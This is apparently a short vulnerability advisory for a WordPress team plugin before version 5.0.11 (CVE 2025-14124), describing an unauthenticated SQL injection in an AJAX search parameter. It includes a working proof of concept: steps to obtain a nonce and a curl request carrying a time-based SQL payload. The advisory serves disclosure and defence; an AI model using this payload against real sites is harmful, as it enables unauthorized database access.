Team < 5.0.11 – Unauthenticated SQLi | CVE 2025-14124

Description

The plugin does not properly sanitize and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.

Proof of Concept

As Admin:

1) Create a team member with an email address via the plugin.
2) Generate a team shortcode for embedding into a page later.
3) Create a post containing the generated shortcode:

As unauthenticated:

1) Go page URL that contains the tlpteam shortcode:
2) Extract tlp_team nonce from the page
3) Get the shortcode ID: Look for "data-sc-id"
4) Execute SQL injection via the ttp_Layout_Ajax_Action search field with the nonce:

time curl -X POST 'http://example.com/wp-admin/admin-ajax.php' \
-d 'action=ttp_Layout_Ajax_Action' \
-d 'scID=XXX' \
-d "tlp_nonce=$NONCE" \
-d "search=t' OR SLEEP(3) OR 't'='t"

5) Payload will execute 3 times; therefore, SLEEP(3) will cause a 9-second response delay.